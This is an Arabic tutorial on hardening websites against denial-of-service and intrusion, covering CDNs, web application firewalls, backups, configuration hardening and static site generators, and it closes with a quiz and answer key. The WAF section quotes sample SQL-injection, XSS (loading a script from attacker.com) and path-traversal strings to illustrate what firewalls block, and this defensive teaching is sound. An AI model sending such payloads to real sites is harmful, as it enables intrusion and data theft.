تعزيز حماية موقع الويب

حالة استخدام

يوجد عدد من الخطوات يمكن اتخاذها لموقع الويب ككل لجعله أكثر مرونة ضد الهجوم، ويتطلب ذلك عادةً جهدًا أقل مقارنة بالمرور على الموقع صفحة بصفحة ويمكن أن تكون ذات تأثير قوي ولذلك من الجيد عمومًا تنفيذ هذه الإجراءات أولًا.

الأهداف

بعد استكمال هذا الموضوع الفرعي، يجب أن يكون الممارس قادرًا على القيام بما يلي:

• استخدام عمليات التطوير والصيانة التي تضمن إمكانية إعادة إنشاء موقعهم إذا كانت خوادم استضافة المنتج غير متوفرة.
• استخدام شبكات توصيل المحتوى (content delivery networks) لحماية موقع الويب الخاص بهم من هجمات حجب الخدمة
• استخدام مُولد مواقع الويب الثابتة لجعل موقعهم أكثر مقاومة لحجب الخدمة والاختراق
• استخدام معززات حماية التكوين وجدران حماية تطبيقات الويب لجعل موقعهم أكثر مقاومة للاختراق

العرض

تُغطي هذه المهارة الفرعية الأنشطة الأساسية على مستوى الموقع والتي يجب تنفيذها في أي موقع تقريبًا يرغب في الحماية من الهجمات، وعلى الرغم من أن كل إجراء قد لا ينطبق على كل موقع، إلا أن بعضها ينطبق على جميع المواقع وكلها تنطبق على بعضها.

كيف تعمل هجمات حجب الخدمة على موقع الويب؟

إحدى الموضوعات الرئيسية لمسار التعلّم هذا هو هجمات حجب الخدمة من أجل فهم كيفية الدفاع ضد هذه الهجمات والرد عليها ونحتاج إلى فهم كيفية عملها.

أنواع الهجوم

يمكن تقسيم هجمات حجب الخدمة على نطاق واسع حسب طبقة التطبيق التي تستهدفها الهجمات، وما إذا كان الهجوم ضخمًا أو إذا كان يستغل الأخطاء في البرنامج المستهدف.

الهجمات على مستوى الشبكة

يعمل نوع هجوم حجب الخدمة الأقل مستوى على مستوى الشبكة، والهدف منه هو هجمات اتصالات الشبكة بين أجهزة الكمبيوتر و/أو معدات التوجيه و/أو نظام التشغيل على الهدف. في الهجمات التي تعتمد على الحجم، يرسل المهاجم كميات كبيرة من حركة مرور الشبكة إلى الهدف، في محاولة لاجتياح الشبكة أو قدرة التبديل/التوجيه لأجهزة الشبكة التي تربط الهدف بالإنترنت. ومن الأمثلة على هذا النوع من الهجمات هي بينغ فلودز (أي “فيضانات أو إغراقات” بينغ) ping floods وهجمات السنافر smurf attacks وهجمات تضخيم بروتوكول زمن الشبكةNTP amplification attacks.

من وقت لآخر يمكن العثور على خطأ في جهاز شبكة أو نظام تشغيل الخادم الذي يسمح بهجمات حجب خدمة أكثر كفاءة تتراوح هذه من “البينغ المميتping of death” الكلاسيكي من التسعينيات، حيث يمكن أن تتسبب حزمة واحدة في تعطل الخادم، إلى مشاكل تصادم التجزئةhash collision issues الأكثر حداثة.

الهجمات على مستوى البروتوكول

تتمثل إحدى خطوات زيادة مكدس الشبكة في الهجمات على مستوى البروتوكول، وبالنسبة لمواقع الويب، ستستخدم جميع هذه الهجمات بروتوكول نقل النص التشعبي لمحاولة التغلب على خادم الويب أو البنية الأساسية للواجهة الخلفية. تُشبه الهجمات الحجمية الهجمات على مستوى الشبكة حيث يتسبب المهاجمون فقط بتدفق كبير لحركة المرور.

توجد أيضًا هجمات حرمان خدمة مستندة إلى الاستغلال على مستوى البروتوكول، وبشكل عام مهاجمة برنامج خادم الويب. أحد الأمثلة على ذلك هو هجوم بوست (HTTP slow POST attack البطيء على بروتوكول نقل النص التشعبي.

الهجمات على مستوى التطبيق

تُعدّ الفئة الأخيرة من هجوم حجب الخدمة هي النوع الذي يهاجم العناصر التي تتطلب الكثير من الموارد لموقع الويب المستهدف نفسه، ونظرًا لأنه يكون مخصصًا للموقع المستهدف، يتطلب هذا النوع من الهجوم مهارات تقنية أكثر من الأنواع الأخرى ولكن يمكن أن يكون فعالًا للغاية ويصعب إيقافه. في هذه الهجمات سيحدد ممثل التهديد وظيفة على موقع الويب تتطلب الكثير من الموارد على جانب الخادم. قد تتضمن الأمثلة صفحة تقوم بتغيير حجم صورة (يمكن أن تستهلك الكثير من ذاكرة الخادم)، وترسل رسائل بريد إلكتروني (يمكن أن تستهلك موارد شبكة غير متناسبة وتؤثر على سمعة خادم البريد)، وتجري بحثًا معقدًا (يمكن أن تستهلك الكثير من وحدة المعالجة المركزية وذاكرة التخزين المؤقت لقاعدة بيانات)، وما إلى ذلك.

عادة ما تعمل هذه الهجمات على التقليل بشكل كبير من تكلفة هجوم حجب الخدمة بالنسبة للمهاجم. وبدلًا من إرسال عشرات أو مئات الآلاف من الطلبات في الثانية، قد يتمكن المهاجم من جعل خادم الويب لا يستجيب مع المئات من الطلبات في الثانية فقط. لا يؤدي هذا فقط إلى تقليل تكلفة المهاجم من حيث الطلبات المرسلة، بل يمكن للمهاجم إخفاء حركة المرور الخاصة به بسهولة أكبر نظرًا لأن حجمها الإجمالي قد لا يكون كبيرًا، بالإضافة إلى أن وقف هذه الهجمات عادة ما يتطلب تغييرات في الموقع نفسه وقد تكون في بعض الحالات واسعة النطاق.

هجوم حجب الخدمة مقابل هجوم حجب الخدمة الموزع (DoS vs DDoS)

الهجمات الموزّعة لحجب الخدمة هي نوع من هجمات حجب الخدمة تأتي فيه حركة المرور الضارة من عدد كبير من المصادر وهو على عكس الهجوم التقليدي حيث يرسل عدد صغير من أجهزة الكمبيوتر حركة المرور الضارة. مع اكتساب المدافعين مهارات وقدرات، أصبحت الهجمات الفعّالة عمومًا هي هجمات موزعة لحجب الخدمة، لأنه من السهل حجب الهجمات التقليدية وغالبًا لا تُولد حركة مرور كافية. تتضمن معظم هجمات حجب الخدمة الموزعة. مهاجمين يستأجرون وقتشبكة روبوتات موجودة بالفعل botnetأو يستأجرون هجمات موزعة لحجب الخدمة على شكل خدمة مخصصة متاحة للاستئجار DDoS-for-hire service، لكن بعض العصابات الهادفة إلى الابتزاز سيكون لها شبكات روبوتات خاصة بها.

ممارسات تنمية وصيانة الموقع

أهم شيء يساعد في الاستعداد للهجمات والرد عليها هو أن تكون قادرًا على إعادة بناء الموقع من الصفر. هذا مهم في هجمات حجب الخدمة حيث قد يصبح الموقع غير متاحًا للمستخدمين النهائيين فحسب بل أيضًا لمالكي الموقع. في بعض الحالات، سيقوم مقدمو خدمات الاستضافة بإزالة الموقع الذي يتعرض للهجوم لأجل تجنّب فرط تحميل قدرة أنظمتهم. في هجمات الاختراق غالبًا ما يكون الحصول على نسخة “نظيفة” من الموقع ضروريًا لأجل إجراء التحليل الجنائي وأيضًا للتنظيف بعد الهجوم.

التحكم بالإصدار

يجب تخزين التعليمات البرمجية للموقع والمحتوى الثابت في نظام تحكم بالإصدار مستند إلى خادم، وغالبًا ما يكون مطورو المواقع أنفسهم هدفًا للهجوم. على سبيل المثال، كان مالك أذربيجاني لموقع على الإنترنت ضحية لهجوم تصيد احتيالي، واستخدم المهاجم وصوله لفتح باب خلفي على موقع الضحية. يمكن أن يؤدي وجود نظام للتحكم بالإصدار، وبالأخص النظام المدار خارجيًا إلى الحد من تأثير اختراق مشرف الموقع. بالإضافة إلى ذلك، فإن تخزين التعليمات البرمجية والمحتوى عن بُعد يوفر مزايا أخرى في حالة وقوع حادث مثل فقدان جهاز الكمبيوتر المحمول. تحتوي خدمات مثل غيت هب GitHub وغيت لاب GitLab على مستويات مجانية تدعم احتياجات الأفراد والمنظمات الصغيرة.

إعداد التطوير المتماثل

إذا كان ذلك ممكنًا، يجب أن يكون لدى القائمين على صيانة الموقع بيئة معزولة توفر إمكانية وصول مضبوطة حيث يمكنهم إجراء تغييرات على موقعهم على الويب واختبارها. قد يكون هذا أمرًا بسيطًا مثل موقع غير منشور ومحمي بكلمة مرور على مزود مثل ووردبرس دوت كوم (Wordpress.com) أو ويكس (Wix)، أو يمكن إعداده بالكامل من خلال عدة مستوعبات على داكر مما يتيح للمطور بيئة كاملة على جهاز الكمبيوتر المحمول الخاص به. على أي حال، قد يكون إجراء تغييرات على المنتج أثناء الهجوم أمرًا صعبًا أو مستحيلًا، ومن السهل جدًا ارتكاب الأخطاء في المواقف عالية التوتر. سيسمح وجود بيئة تطوير منفصلة لمسؤولي صيانة الموقع بإجراء التغييرات واختبارها في مكان آمن قبل نقل هذه التغييرات إلى المنتج.

النسخ الاحتياطية لقاعدة البيانات

إذا كان موقع الويب يحتوي على قاعدة بيانات، فمن المهم إبقاء نسخة احتياطية من قاعدة البيانات هذه واختبار هذه النسخ الاحتياطية، ومن الناحية المثالية يجب إجراء النسخ الاحتياطية تلقائيًا وتخزين النسخ الاحتياطية القديمة. بهذه الطريقة إذا تمكن المهاجم من استخدام ثغرة أمنية مثل حقن إس كيو إل (SQL) لإفساد قاعدة البيانات، يمكن استعادة نسخة نظيفة حتى لو لم يتم اكتشاف الهجوم على الفور. إذا كانت قاعدة البيانات صغيرة يمكن تخزينها ضمن نظام التحكم بالإصدار الخاص بالموقع. ويمكن تخزين النسخ الاحتياطية الأكبر بشكل آمن وغير مكلف على أنظمة مثل إيه دبليو إس إس 3 AWS S3 أو التخزين السحابي الخاص بجي سي ب (GCP’s Cloud Storage. بالطبع يحتاج نظام التخزين إلى تمكين ميزة التحكم بالوصول، ومن الناحية المثالية يجب أن تحتوي العمليات التي تنتج نسخة احتياطية من البيانات فقط على أذونات لإضافة ملفات جديدة إلى التخزين وليس قراءة البيانات الموجودة أو كتابتها أو حذفها.

استخدام شبكات توصيل المحتوى المقاومة أو الاستضافة المقاومة لهجمات حجب الخدمة

نظرًا لأن هجمات حجب الخدمة هي التهديد الأكثر شيوعًا الذي يواجه مواقع المجتمع المدني، يجب أن تكون الأولوية التالية لمالك الموقع هي إنشاء دفاعات أساسية ضد هجمات حجب الخدمة. هناك طريقتان للقيام بذلك هما استخدام شبكة توصيل المحتوى مع حماية ضد هجمات حجب الخدمة أو استخدام مزود استضافة مقاوم لهجمات حجب الخدمة.

استخدام شبكات توصيل المحتوى المقاومة لهجمات حجب الخدمة

كانت شبكات توصيل المحتوى في الأصل بمثابة وسيلة لخدمة موارد الويب الثابتة بشكل أسرع وبتكاليف خادم أقل، وكانت تستخدم بشكل عام من قبل مواقع الويب ذات حركة المرور العالية. عادةً ما يستخدم مالك موقع الويب اسم مضيف مميز (مثل images.example.com) ويعطي تحكم في خدمة أسماء المجالات لاسم المضيف إلى مزوّد شبكة توصيل المحتوى. يمتلك مزود شبكة توصيل المحتوى شبكة كبيرة من خوادم الويب، موجودة من الناحية المثالية بالقرب من المستخدمين النهائيين (من حيث طوبولوجيا الشبكة). تسمى هذه الخوادم خوادم “الحافة”، وعندما يجري المستخدم النهائي بحثًا على نظام اسم المجال عن اسم المضيف ذلك، تستجيب خوادم مزود شبكة توصيل المحتوى بعنوان بروتوكول الإنترنت لخادم حافة شبكة توصيل المحتوى “الأقرب”. عندما يطلب المستخدم النهائي موردًا (صفحة ويب أو صورة أو ملف صوت، إلخ) من خادم الحافة، يرى خادم الحافة أولًا ما إذا كان يحتوي على المورد في ذاكرة التخزين المؤقت الخاصة به. وإذا لم يكن لديه يطلب المورد من موقع الويب الأصلي (يسمى خادم “الأصل”) ويخزنه في ذاكرة التخزين المؤقت. بمجرد انتقال المورد إلى ذاكرة التخزين المؤقت الخاصة به، يمكنه تقديمه إلى المستخدم النهائي، وخلال الطلبات اللاحقة، سيرد على الفور باستخدام المورد المخزن مؤقتًا. على موقع ويب عالي الاستخدام، يقلل هذا من الحمل على خادم الأصل ويؤدي أيضًا إلى تقليل وقت استجابة الشبكة.

مع بمرور الوقت أصبحت فائدة شبكات توصيل المحتوى واضحة في الحماية من هجمات حجب الخدمة، حيث تتمتع شبكات توصيل المحتوى بسعة نطاق ترددي واسعة وبرامج خادم ويب متخصصة وبالتالي يمكن أن تُبدد حركة المرور من هجمات حجب الخدمة وتوقف الهجمات على مستوى الشبكة ومعظم الهجمات على مستوى البروتوكول ضد محتوى الويب الثابت. للحماية من الهجمات على مستوى البروتوكول ضد أي صفحة، تقوم مواقع الويب بتقديم كامل المحتوى من خلال شبكة توصيل المحتوى بدلًا من مجرد المحتوى الثابت. نظرًا لأن شبكات توصيل المحتوى توفر الحماية للعديد من العملاء، يمكنها تطوير أدوات وتقنيات وخبرات متخصصة في اكتشاف هجمات حجب الخدمة وحظرها. تتضمن أمثلة حلول شبكة توصيل المحتوى المقاومة لحجب الخدمة دفلكت Deflect وبروجكت شيلد Project Shield وفاستلي Fastly, وكلاودفلير CloudFlare.

إحدى التحذيرات المهمة لاستخدام شبكة توصيل المحتوى لحماية موقع الويب الخاص بك من هجمات حجب الخدمة هو أنه من الضروري تقييد حركة المرور على خوادم الويب الأصلية الخاصة بك. لنفترض أن موقعك على الويب الذي يتم تقديمه من خلال شبكة توصيل المحتوى يستخدم اسم المضيف www.example.com.، وتستخدم أنت origin.example.com لخادم الويب الأصلي “الحقيقي”. إذا أطلق أحد المهاجمين هجوم حجب خدمة ضد origin.example.com، فسيتجاوز شبكة توصيل المحتوى تمامًا ولن يستفيد موقعك على الإطلاق. بدلًا من ذلك يجب أن يكون لخوادم الويب الأصلية قيود على عنوان بروتوكول الإنترنت على مستوى الشبكة (على سبيل المثال عبر جدار حماية) أو أن تكون معزولة تمامًا عن الإنترنت ولا يمكن الوصول إليها إلا عبر شبكة ظاهرية خاصة.

بالإضافة إلى ذلك، توجد بعض التكوينات الخاطئة التي يمكن أن تتسبب في عدم قيام خادم حافة شبكة توصيل المحتوى بالتعرف على المحتوى الثابت مقابل المحتوى الديناميكي. على سبيل المثال، إذا كان موقع الويب يحتوي على صفحة ويب مثل www.example.com/profile، لن تعرف شبكة توصيل المحتوى تلقائيًا أن الصفحة تحتوي على معلومات خاصة. تُعدّ الطريقة الأكثر شيوعًا للتغلب على ذلك هي تكوين شبكة توصيل المحتوى على ذاكرة التخزين المؤقت استنادًا إلى رؤوس الاستجابة ثم تعيين رأس تحكم-ذاكرة التخزين المؤقت الذي تكون قيمته خاصة أو مشابهة. سيُخبر هذا شبكة توصيل المحتوى أن الصفحة تحتوي على معلومات خاصة ولن يعطي المحتوى ذاته إلى مستخدمين مختلفين. وستختلف تفاصيل كيفية تكوينه واستخدامه بين مزودي شبكة توصيل المحتوى لذا تأكد من الرجوع إلى وثائق مزود الخدمة قبل إعداد شبكة توصيل المحتوى. من الجيد أيضًا أن يكون لديك موقع ما قبل الإصدار تم تكوينه باستخدام نفس شبكة توصيل المحتوى وإعدادات موقع المنتج وبهذه الطريقة يمكن لمديري الموقع التحقق من التغييرات الرئيسية قبل بدء التشغيل.

استضافة مقاومة لهجمات حجب الخدمة

Greenhost

يود شبكة توصيل المحتوى المقاومة لحجب الخدمة ومزوّدي خدمة الاستضافة

ربما لاحظت أن الحماية التي توفرها شبكة توصيل المحتوى ومقدمو خدمات الاستضافة المقاومة لحجب الخدمة تغطي غالبية الهجمات، لكن المواد المذكورة أعلاه استبعدت الهجمات على مستوى التطبيق. قد تكون هناك عيوب في موقع الويب تسمح بهجمات حجب خدمة بأحجام منخفضة جدًا. لا تكون الدفاعات القياسية ضد هجمات حجب الخدمة فعّالة في هذه الحالة، ولكن قد يتمكن موظفو الدعم والاستجابة السريعة في شبكة توصيل المحتوى ومقدمو خدمات الاستضافة من المساعدة في دعم مالكي مواقع الويب في حالة وجود هجوم حجب خدمة نشط على مستوى التطبيق ضد موقعهم على الويب.

يغطى الدفاع ضد الهجمات على مستوى التطبيق بتعمّق أكبر في الموضوع الفرعي بعنوان الاستجابة لحوادث حجب الخدمة (الموضوع الفرعي 3 في مسار التعلّم هذا).

استخدام جدران حماية تطبيقات الويب

تُعدّ جدران حماية تطبيقات الويب WAFs (web application firewalls)أجهزة شبكة تقع بين المستخدم النهائي والخادم الأصلي لموقع الويب مثل شبكة توصيل المحتوى، وبينما توفر شبكة توصيل المحتوى الحماية ضد هجمات حجب الخدمة، يحاول جدار حماية تطبيقات الويب الحماية من هجمات الاختراق. تقوم جدران حماية بفحص الطلبات الواردة وتحظر الطلبات التي تبدو ضارة، على سبيل المثال المعلمات التي تحتوي على أشياء مثل ’ أو1=1;– (SQL injection) ،"><script src="http://attacker.com/payload.js"><z a=" (البرمجة النصية عبر المواقع (XSS))، أو ../../../../../../etc/passwd (اجتياز الدليل). في حين أنه لا يمكن لأي جدار حماية تطبيقات ويب توفير حماية مثالية ضد القرصنة، إلا أنها قد يكون فعّالًا بما يكفي لحماية الموقع من الاختراق ويجعل دائمًا مهمة المهاجم في تحديد نقاط الضعف أكثر صعوبة. وفي معظم الحالات، لن يعطل جدار حماية تطبيقات الويب الجيد المحتوى السليم ولكن ذلك أمر يمكن أن يحصل. على سبيل المثال، إذا كان الموقع منتدى مناقشة يتحدث عن تطوير الويب الآمن فمن المرجح أن يحجب جدار حماية تطبيقات الويب المشاركات السليمة حول تقنيات الهجوم، كما هو الحال مع شبكات شبكة توصيل المحتوى، من الجيد جدًا أن يكون لديك موقع ما قبل الإصدار حيث يمكن اختبار التغييرات قبل نشرها.

تحتوي معظم شبكات توصيل المحتوى المقاومة لحجب الخدمة أيضًا على وظائف جدار حماية تطبيقات الويب. يوجد أيضًا موفرو جدار حماية تطبيقات ويب متخصصون بتقديم خدمات إضافية تشمل بشكل عام حجب الخدمة. على سبيل المثال، سوكوري Sucuri هو مزود جدار حماية تطبيقات ويب يوفر أيضًا حماية حجب خدمة وبعض قدرات النسخ الاحتياطي والاستجابة للحوادث، بالإضافة إلى وورد فنس WordFence المزود لجدار حماية تطبيقات ويب والمتخصص في حماية المواقع المبنية على وورد برس ومنع محاولات القرصنة العامة وهجمات حجب الخدمة، يحاول منع الهجمات التي تستهدف مواقع وورد برس على وجه التحديد.

توجد أيضًا جدران حماية تطبيقات ويب تصمم لتعمل على ذات الخادم أو الشبكة الخاصة بموقع الويب التي يحميها، ومن الأمثلة على ذلك منتجات باراكودا (Barracuda) وإف 5 (F5) باهظة الثمن، وكذلك الحلول مفتوحة المصدر مثل مود سيكيوريتي ModSecurity. لاحظ أن هذه الأنظمة بشكل عام لا توفر حماية حجب الخدمة من تلقاء نفسها.

معززات حماية التكوين

تعتمد مواقع الويب بشكل عام تقريبًا على نوع إطار عمل يتعامل مع معظم أعمال خدمة صفحات الويب، وقد يكون هذا إطار عمل منخفض المستوى، مثل إن جي آي إن إكس (nginx) يتعامل فقط مع الشبكات وبروتوكول نقل نص تشعبي الأساسي، أو إطار عمل عالي المستوى للغاية مثل ووردبرس الذي يتعامل مع كل شيء باستثناء محتوى الموقع. في الغالبية العظمى من الحالات يوفر إطار العمل مجموعة من الميزات والقدرات وخيارات تكوين أخرى لا يحتاج موقع الويب معظمها. تُعرّض هذه الميزات والتكوينات غير الضرورية موقع الويب لمخاطر إضافية من خلال زيادة الأجزاء المعرضة للهجوم (واحتمال وجود أخطاء مكشوفة) أو تكوينات غير آمنة بحد ذاتها. في حين أنه من الممكن دراسة قدرات إطار العمل يدويًا وتحديد كيفية تمكين الميزات والتكوينات بمفردها، إلا أنه من الأسهل والأكثر فعالية بشكل عام استخدام أداة أو مجموعة من خطوط الأساس الافتراضية وعادة ما تُمثل معززات حماية التكوين هذه آلاف الساعات من العمل لتأمين النظام قدر الإمكان دون جعله غير قابل للاستخدام.

كما هو الحال مع أي تغييرات في النظام من المستحسن وربما الضروري حتى وجود بيئة منفصلة لاختبار التغييرات، بالإضافة إلى وجود عملية اختبار للتأكد من أن كل شيء يعمل بشكل صحيح قبل نشر التغييرات على المنتج. قد يعتمد الموقع على تكوين غير آمن أو ميزة لا تستخدم كثيرًا كي يعمل بشكل صحيح، وفي هذه الحالة من الأفضل التقاط ذلك قبل وضع موقع قيد الاستخدام ومُعاد تهيئته.

يوفر إطار عمل تعزيز حماية ديف سيك DevSec Hardening Framework مجموعة من خطوط الأساس الأمنية لتعزيز حماية مجموعة واسعة من برامج البنية التحتية الشائعة الاستخدام، مثل لينوكس وماي إس كيو إل (MySQL) وأباتشي (Apache) وداكر وما إلى ذلك. توثق خطوط الأساس على موقع الويب وتوفر وصفات لمديري التكوين مثل شيف (Chef) وببت (Puppet) وآنسبل (Ansible).

تتعمق عوامل تعزيز حماية التكوين الأخرى في الأطر التي تؤمنها، ومثال على ذلك سنفل أبيجوس Snuffleupagus الذي يؤمن تثبيت ب إتش ب (PHP)، بالإضافة إلى توفير تغييرات التكوين، يُغير سلوك الوظائف لجعلها أقل خطورة. ومثال على ذلك تغيير دالةsystem() بحيث يزيل الأحرف التي يحتمل أن تكون خطرة من مدخلاته، ودالة mail() لعدم السماح بالميزات التي يمكن استخدامها لكتابة الملفات العشوائية.

في حين أن أدوات تعزيز حماية التكوين لا يمكنها القضاء على كل ثغرة أمنية في موقع الويب، ويتطلب استخدامها اختبارًا دقيقًا للموقع بعد ذلك، إلا إنها إحدى أسهل الطرق لإغلاق أو إبطاء استغلال الموقع.

مُولد مواقع الويب الثابتة

تستخدم العديد من مواقع الويب نظام إدارة المحتوى لإدارة الموقع على الرغم من أن المحتوى على الموقع لا يتغير لكل زائر. وفي حين أنه يوجد بالتأكيد مواقع تحتاج إلى تحديث عدة مرات في الدقيقة، أو تخصيص محتوى لكل زائر فإن معظمها مواقع ثابتة بشكل أساسي. في هذه الحالة تعني كلمة “ثابت” عادة أنه يجري تحديثها كل بضع ساعات أو أقل ومن أجل الراحة تُنشئ معظم هذه المواقع ديناميكيًا في كل زيارة، ولا بأس بذلك للاستخدام العادي. لكن يمثل ذلك بعض المشاكل بالنسبة لموقع يتعرض للاستهداف.

ففي البداية يُعرّض هذا السلوك الديناميكي الأجزاء المعرضة لهجوم المتطفلين، وبدلًا من أن يكون مجرد خادم ويب وبعض الملفات، يصبح الموقع عبارة عن مجموعة معقدة من السلوك الديناميكي مدعومة بمزيج من الملفات وقواعد البيانات، ومن المرجح أن تحتوي الأخيرة على ثغرة أمنية يمكن استغلالها من قبل المهاجم.

ثانيًا، يستغرق التجميع المعقّد لقواعد البيانات والبرامج النصية وقتًا أطول بكثير لتوليد استجابة بروتوكول نقل النص التشعبي من موقع ثابت، ويتسبب هذا التعقيد الإضافي في المعالجة بجعل هجمات حجب الخدمة أكثر فعالية بكثير.

باختصار، إذا كان موقع الويب يمكن أن يعمل على شكل موقع ثابت فستكون قدرته على الصمود أكبر بكثير مقارنة بعمله على شكل موقع ديناميكي، وبالإضافة إلى أنه يوسع خيارات استضافة الموقع ويقلل من تكاليف الاستضافة، حيث يمكن دعم الموقع بأشياء مثل مساحات تخزين مقدمي الخدمات السحابية وصفحات غيت هب وما إلى ذلك.

تحتوي بعض مُولدات مواقع الويب الثابتة على بنية بسيطة خاصة بها لمحتوى الموقع وتعتمد عمومًا على مجموعة من ملفات ماركداون (Markdown) وبعض قوالب تصميم لغة تمييز النص التشعبي، وبعض ملفات التكوين، لكن تستخدم العديد من أنظمة إدارة المحتوى مولدات موقع ثابتة على الواجهة الخلفية لإنتاج موقع الويب النهائي. وبالطبع من الممكن أيضًا حفظ ملفات المصدر في غيت أو ما شابه ذلك. على أي حال سيقوم مالكو الموقع بإجراء تغييرات على تكوين موقع الويب ثم إنشاء الموقع الثابت الكامل واختباره وتحميله لكل تغيير. تشمل أمثلة بعض مولدات المواقع الثابتة المستقلة الشائعة هيوغو Hugo و جيكيل Jekyll. ولإدارة المحتوى، تتضمن أمثلة أنظمة إدارة المحتوى التي تستخدم مولدات المواقع الثابتة كلاود كانن Cloud Cannon أو ستاتك سي إم إٍس Static CMS.

يتمثل الجانب السلبي في الانتقال إلى مولد موقع ويب ثابت مثل هيوغو أو جيكيل في أنه يجب عليك نقل المحتوى الموجود. وبالنسبة لمواقع الويب التي تستخدم نظام إدارة محتوى مختلف، يمكن أن يكون أمرًا يتطلب الكثير من العمل، لكن قد يكون من الممكن استخدام مولد موقع ثابت لمنصتك الحالية. ومن الأمثلة الشائعة دبليو ب 2 ستاتك WP2Static، وهو مكون إضافي مفتوح المصدر لووردبرس يحوله إلى موقع ثابت. لا تزال هناك حاجة إلى النقل وستحتاج نماذج التواصل إلى تغييرها وستحتاج إلى نقلها إلى خدمة تابعة لجهة خارجية مثل ديسْكَس Disqus أو ريبلابوكس ReplyBoxأو العديد من الخدمات الأخرى. لاحظ أن استخدام خدمة تعليق يوفرها طرف ثالث ستجعل طرفًا آخر هو من يتحكم في تعليقات مستخدمي موقعك.

اختبار مهارة

يؤدي تعزيز حماية موقع الويب دورًا حاسمًا في حماية الأصول عبر الإنترنت من التهديدات السيبرانية المختلفة، وتستكشف هذه المجموعة من الأسئلة الصعبة متعددة الخيارات المفاهيم الأساسية لتعزيز حماية موقع الويب، مع التركيز على الاستراتيجيات والتقنيات الرئيسية التي تهدف إلى تعزيز مرونة تطبيقات الويب ضد نقاط الضعف الشائعة. من عمليات التطوير والصيانة لضمان توافر الموقع إلى تطبيق شبكات توصيل المحتوى ومولدات المواقع الثابتة، تتعمق هذه الأسئلة في تفاصيل تعزيز المواقع الإلكترونية ضد هجمات القرصنة.

اختبر معرفتك بممارسات تعزيز حماية موقع الويب لتكسب نظرة متعمّقة حول التدابير الأساسية لتعزيز الوضع الأمني لمنصاتك عبر الإنترنت. إذا كان ذلك ممكنًا، ناقش إجاباتك على هذه الأسئلة مع أحد الأقران أو مُرشِد ليساعد في التحقق من فهمك للموضوع بشكل صحيح.

1. ما هي عملية التطوير والصيانة التي تضمن إمكانية إعادة إنشاء موقع ويب إذا كانت خوادم استضافة الإنتاج غير متوفرة؟ أ) تحديث المكونات الإضافية والسمات الخاصة بموقع الويب بانتظام
   ب) تنفيذ المصادقة متعددة العوامل لحسابات المسؤول
   ج) استخدام أنظمة التحكم في الإصدار والنسخ الاحتياطي الآلي د) فرض سياسات صارمة لكلمة المرور لحسابات المستخدمين

2. كيف يمكن لشبكة توصيل المحتوى أن تساعد في حماية موقع الويب من هجمات حجب الخدمة؟ أ) بتوزيع محتوى الموقع على خوادم متعددة لتلبية الزيارات المفاجئة. ب) عن طريق تشفير جميع البيانات المرسلة بين الخادم والعميل ج) من خلال توفير طبقات إضافية من المصادقة لتسجيل دخول المستخدم د) عن طريق حظر الوصول تلقائيًا إلى عناوين بروتوكول الإنترنت المشبوهة

3. ما هي التكنولوجيا التي يمكن أن تعزز مقاومة موقع الويب لحجب الخدمة والقرصنة من خلال تقديم صفحات لغة تمييز النص التشعبي المقدمة مسبقًا للمستخدمين؟ أ) منصات حوسبة بدون خوادم ب) أطر عمل تطبيقات الويب الديناميكية
   ج) نظم إدارة المحتوى
   د) مولدات المواقع الثابتة

4. كيف تساهم أدوات تعزيز حماية التكوين وجدران حماية تطبيقات الويب في جعل موقع الويب أكثر مقاومة للاختراق؟ أ) من خلال تحسين أداء الخادم واستخدام الموارد
   ب) من خلال تنفيذ طبقات إضافية من المصادقة لتسجيل دخول المستخدم ج) عن طريق الكشف التلقائي عن أنماط الهجوم المعروفة وحركة المرور المشبوهة وحظرها
   د) عن طريق تشفير جميع البيانات المرسلة بين الخادم والعميل

الإجابات الصحيحة والشروح:

1. إجابة صحيحة: ج) استخدام أنظمة التحكم في الإصدار والنسخ الاحتياطي الآلي الشرح: يضمن استخدام أنظمة التحكم في الإصدار (مثل غيت) والنسخ الاحتياطي الآلي تخزين قاعدة التعليمات البرمجية والبيانات الخاصة بموقع الويب بشكل آمن ويمكن استعادتها بسهولة في حالة فشل الخادم أو فقدان البيانات. تساعد هذه الممارسة في الحفاظ على سلامة الموقع وتقليل وقت التعطّل.
2. إجابة صحيحة: أ) بتوزيع محتوى الموقع على خوادم متعددة لتلبية الزيارات المفاجئة. الشرح: تُساعد شبكة تسليم على حماية موقع الويب من هجمات حجب الخدمة من خلال توزيع محتواه عبر خوادم متعددة تقع في مواقع جغرافية مختلفة. يُساعد هذا التوزيع في توزيع حمل استخدام الشبكة الوارد، مما يقلل من تأثير هجمات حجب الخدمة وضمان بقاء الموقع في متناول المستخدمين حتى خلال فترات ارتفاع حركة المرور.
3. إجابة صحيحة: د) مولدات المواقع الثابتة الشرح: يقوم منشئو المواقع الثابتة بإنشاء مواقع ويب عن طريق إنشاء صفحات لغة تمييز النص التشعبي من ملفات المصدر أثناء عملية الإنشاء. نظرًا لأن المواقع الثابتة لا تعتمد على المعالجة من جانب الخادم أو قواعد البيانات، فهي بطبيعتها أكثر مقاومة للقرصنة وهجمات حجب الخدمة. عادةً ما يكون تحميل المواقع الثابتة أسرع ومن الأسهل تخزينها مؤقتًا، مما يعزز قدرتها على الصمود أمام الهجمات.
4. إجابة صحيحة: ج) عن طريق الكشف التلقائي عن أنماط الهجوم المعروفة وحركة المرور المشبوهة وحظرها الشرح: تساعد أدوات تعزيز حماية التكوين وجداران حماية تطبيقات الويب في جعل موقع الويب أكثر مقاومة للاختراق من خلال الكشف التلقائي عن أنماط الهجوم المعروفة وحركة المرور المشبوهة وحظرها. تعمل هذه التدابير الأمنية كحاجز بين موقع الويب والمهاجمين المحتملين، وتصفية الطلبات الواردة وحركة المرور لمنع الأنشطة الضارة والوصول غير المصرح به.

موارد التعلّم